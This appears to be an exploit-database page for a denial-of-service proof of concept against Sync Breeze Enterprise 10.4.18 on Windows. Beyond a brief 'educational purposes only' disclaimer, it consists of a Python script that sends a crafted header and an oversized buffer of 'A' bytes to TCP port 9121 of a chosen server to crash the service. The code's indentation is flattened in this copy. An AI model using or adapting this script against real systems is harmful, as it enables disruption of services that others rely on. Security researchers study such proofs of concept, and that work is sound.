Sync breeze enterprise 10.4.18 denial ofservice (poc) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-04-01 | Type : dos | Platform : windows
This exploit / vulnerability Sync breeze enterprise 10.4.18 denial ofservice (poc) is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

#!/usr/bin/python
import socket
import sys
from struct import pack

try:
server = sys.argv[1]
port = 9121
size = 1000

inputBuffer = b"\x41" * size

header = b"\x75\x19\xba\xab"
header += b"\x03\x00\x00\x00"
header += b"\x00\x40\x00\x00"
header += pack('<I', len(inputBuffer))
header += pack('<I', len(inputBuffer))
header += pack('<I', inputBuffer[-1])

buf = header + inputBuffer

print("Sending evil buffer...")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
s.send(buf)
s.close()

print("Done!")

except socket.error:
print("Could not connect!")